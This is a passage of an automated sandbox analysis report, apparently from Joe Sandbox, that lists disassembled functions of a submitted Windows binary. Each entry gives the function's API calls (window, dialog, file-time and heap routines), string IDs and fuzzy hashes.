                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 000FDABE
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                                • Part of subcall function 00101596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00130EE8,00000200,000FD202,00000000,?,00000050,00130EE8), ref: 001015B3
                                                                                              • _strlen.LIBCMT ref: 000FDADF
                                                                                              • SetDlgItemTextW.USER32(?,0012E154,?), ref: 000FDB3F
                                                                                              • GetWindowRect.USER32(?,?), ref: 000FDB79
                                                                                              • GetClientRect.USER32(?,?), ref: 000FDB85
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 000FDC25
                                                                                              • GetWindowRect.USER32(?,?), ref: 000FDC52
                                                                                              • SetWindowTextW.USER32(?,?), ref: 000FDC95
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 000FDC9D
                                                                                              • GetWindow.USER32(?,00000005), ref: 000FDCA8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 000FDCD5
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 000FDD47
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 8ab0216cf064e864b11cb396308d6e4d60f8b1b3513b83562296c3b756cb55b1
                                                                                              • Instruction ID: 81a8c9d14bbec3ad12c639f9c2f953cb835ec9b1da445ccfb5e44328f5e6a9ca
                                                                                              • Opcode Fuzzy Hash: 8ab0216cf064e864b11cb396308d6e4d60f8b1b3513b83562296c3b756cb55b1
                                                                                              • Instruction Fuzzy Hash: B681AF72208305AFD710DF68CD89B6FBBEAEB89704F04092DFA8497291D671E945CB52
                                                                                              Function 0011C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0011C277
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE2F
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE41
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE53
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE65
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE77
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE89
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BE9B
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEAD
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEBF
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BED1
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEE3
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BEF5
                                                                                                • Part of subcall function 0011BE12: _free.LIBCMT ref: 0011BF07
                                                                                              • _free.LIBCMT ref: 0011C26C
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011C28E
                                                                                              • _free.LIBCMT ref: 0011C2A3
                                                                                              • _free.LIBCMT ref: 0011C2AE
                                                                                              • _free.LIBCMT ref: 0011C2D0
                                                                                              • _free.LIBCMT ref: 0011C2E3
                                                                                              • _free.LIBCMT ref: 0011C2F1
                                                                                              • _free.LIBCMT ref: 0011C2FC
                                                                                              • _free.LIBCMT ref: 0011C334
                                                                                              • _free.LIBCMT ref: 0011C33B
                                                                                              • _free.LIBCMT ref: 0011C358
                                                                                              • _free.LIBCMT ref: 0011C370
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 497d9e843651d47b7417f29c931e279087bb791e71ebe3af9f43f38c7de0f6e4
                                                                                              • Instruction ID: a7dd3b6dd2c1152eeeeb21ba61ca60ad86d3094a1ee32cc799470ec74287911d
                                                                                              • Opcode Fuzzy Hash: 497d9e843651d47b7417f29c931e279087bb791e71ebe3af9f43f38c7de0f6e4
                                                                                              • Instruction Fuzzy Hash: A83157326406059FEB38AE78D945BDAB3E9BF20310F14C53AE459DB951DF31ACD0DAA0
                                                                                              Function 0010CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 0010CD51
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0010CD7D
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0010CD99
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0010CDB0
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0010CDC4
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0010CDED
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010CDF4
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0010CDFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: c37a4ae6f881db0a84c72b5856bfb95af2b064a78ab3dee18eaabb5a4c59fb47
                                                                                              • Instruction ID: 7c7ea55c91c3def40a72e086d175746b3d40bb6fb43712576640f091880c3c2d
                                                                                              • Opcode Fuzzy Hash: c37a4ae6f881db0a84c72b5856bfb95af2b064a78ab3dee18eaabb5a4c59fb47
                                                                                              • Instruction Fuzzy Hash: 7611E733541711BBE6216BB0DC49F9F3A5CAB66752F004520FA86A90D2CBF489469AE4
                                                                                              Function 00118EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00118EC5
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 00118ED1
                                                                                              • _free.LIBCMT ref: 00118EDC
                                                                                              • _free.LIBCMT ref: 00118EE7
                                                                                              • _free.LIBCMT ref: 00118EF2
                                                                                              • _free.LIBCMT ref: 00118EFD
                                                                                              • _free.LIBCMT ref: 00118F08
                                                                                              • _free.LIBCMT ref: 00118F13
                                                                                              • _free.LIBCMT ref: 00118F1E
                                                                                              • _free.LIBCMT ref: 00118F2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: e39a156ceeb6e2bb673ed8192fc224a7de1878f29ba3372c1fcf039cec387b85
                                                                                              • Instruction ID: 07d6ff147612d53e8fa7a2314ed68189cbcf2a69b1b00de6ccada319f6191d34
                                                                                              • Opcode Fuzzy Hash: e39a156ceeb6e2bb673ed8192fc224a7de1878f29ba3372c1fcf039cec387b85
                                                                                              • Instruction Fuzzy Hash: C511A77650010DAFCB29EF94D942DDE3B65FF24350B5181A5B9084B926DF31DA919B80
                                                                                              Function 000F2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 0-2277559157
                                                                                              • Opcode ID: d45baba41763784845b229d19c2e98b2940d38634f725cb7baa4ac7ecc0ed7df
                                                                                              • Instruction ID: ab8e3bb1028967cb0c9156a4b9544ffc495601bc539071272cebb379101311a0
                                                                                              • Opcode Fuzzy Hash: d45baba41763784845b229d19c2e98b2940d38634f725cb7baa4ac7ecc0ed7df
                                                                                              • Instruction Fuzzy Hash: A7F1167160834C5BDB15EF348996BFE77D96F90300F080479FB85CBA83DA649948E7A2
                                                                                              Function 0010ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010AD20
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0010AD47
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0010AD60
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0010AD71
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0010AD7A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0010AD8E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0010ADA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: ed9baadd805f2400e78ab872f8b8b7cee356f995963337089234515c0dc579c3
                                                                                              • Instruction ID: 9ff19b3373042cdbcd9aaf20dacb009bd5f5998aaef8b0fca6ae8fb0610ea745
                                                                                              • Opcode Fuzzy Hash: ed9baadd805f2400e78ab872f8b8b7cee356f995963337089234515c0dc579c3
                                                                                              • Instruction Fuzzy Hash: 3421B432240304BBD2255FA1EC49E7B3B6DFB4BB57F010014F685A6CE0DBA2A980D732
                                                                                              Function 000F9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F9448
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000F946B
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000F948A
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • _swprintf.LIBCMT ref: 000F9526
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 000F9595
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 000F95D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 2111052971-3303766350
                                                                                              • Opcode ID: 1a3fb88f2b13920ebd509d66c7b80e12b137d89c9e2807f05553e5d6b731b2b4
                                                                                              • Instruction ID: d4832c3091932d3dad5be9eb4b6106d047704b20a155cec7e4cfd073724efc72
                                                                                              • Opcode Fuzzy Hash: 1a3fb88f2b13920ebd509d66c7b80e12b137d89c9e2807f05553e5d6b731b2b4
                                                                                              • Instruction Fuzzy Hash: FE413E7190025C76CB30EBA08C85AFF73BCAF55780F0444A5B649E3452EB749B89EFA4
                                                                                              Function 00108E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00108F38
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00108F59
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00108F80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 4094277203-4209811716
                                                                                              • Opcode ID: d710ca9dd2d38494e33539f1c1a403d4e40329b4392b1dfdceac9e8c24a0fdea
                                                                                              • Instruction ID: bbd8c3549563931d53cd4f1fcc861895103e976d72162b0a8905b45b826c2d51
                                                                                              • Opcode Fuzzy Hash: d710ca9dd2d38494e33539f1c1a403d4e40329b4392b1dfdceac9e8c24a0fdea
                                                                                              • Instruction Fuzzy Hash: 6A315B7254C3127BD728BB34DC06FAF7769EF61760F000129F8D1962C2EFA49A5983A1
                                                                                              Function 00100A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00100A9D
                                                                                                • Part of subcall function 000FACF5: GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00100AC0
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00100AD2
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00100AE3
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100AF3
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100B03
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00100B3D
                                                                                              • __aullrem.LIBCMT ref: 00100BCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: e149ce5aca20fab3789138c7459f8a0730dea58c14ead1d6e9b6eeec37c18aef
                                                                                              • Instruction ID: 7f97bbb7e2b0233e7945e762b515c2e5d435f4934bb7b82891c36435c11527f5
                                                                                              • Opcode Fuzzy Hash: e149ce5aca20fab3789138c7459f8a0730dea58c14ead1d6e9b6eeec37c18aef
                                                                                              • Instruction Fuzzy Hash: 6D4149B5508305AFC310DF65C880A6BFBF8FB88714F004A2EF5D692650E778E599CB61
                                                                                              Function 0011EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0011F5A2,?,00000000,?,00000000,00000000), ref: 0011EE6F
                                                                                              • __fassign.LIBCMT ref: 0011EEEA
                                                                                              • __fassign.LIBCMT ref: 0011EF05
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0011EF2B
                                                                                              • WriteFile.KERNEL32(?,?,00000000,0011F5A2,00000000,?,?,?,?,?,?,?,?,?,0011F5A2,?), ref: 0011EF4A
                                                                                              • WriteFile.KERNEL32(?,?,00000001,0011F5A2,00000000,?,?,?,?,?,?,?,?,?,0011F5A2,?), ref: 0011EF83
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: c0eb4d654cc27dd2d400d2aec2e1ae85a42be79aacd4077d0ae5a91ebb021cd3
                                                                                              • Instruction ID: 1cec6f2e256e25cef6cf3a2bf6c77db6855ab617f2d85344058c331f1a96c171
                                                                                              • Opcode Fuzzy Hash: c0eb4d654cc27dd2d400d2aec2e1ae85a42be79aacd4077d0ae5a91ebb021cd3
                                                                                              • Instruction Fuzzy Hash: 6C51B471A00209AFDB14CFE8D845EEEBBF5EF08310F24452AED55E7291D7709991CB60
                                                                                              Function 0010C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0010C54A
                                                                                              • _swprintf.LIBCMT ref: 0010C57E
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • SetDlgItemTextW.USER32(?,00000066,0013946A), ref: 0010C59E
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0010C5D1
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010C6B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 2892007947-1360425832
                                                                                              • Opcode ID: ac6465cd00770d3002e0f9fe2fb40889a62f2d4401bf087a457a81e36a18c536
                                                                                              • Instruction ID: 1f4aaffe7e22169aaf62f87c011995b857b9f4175d56cfc04a6adc9f6941ef88
                                                                                              • Opcode Fuzzy Hash: ac6465cd00770d3002e0f9fe2fb40889a62f2d4401bf087a457a81e36a18c536
                                                                                              • Instruction Fuzzy Hash: 0C41B275A0061CEADB25DBA0DC45EEA77BCEF18315F0041A2E549D70A1E7B19BC4CF90
                                                                                              Function 00109635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0010964E
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00109693
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 0010972A
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00109732
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00109748
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
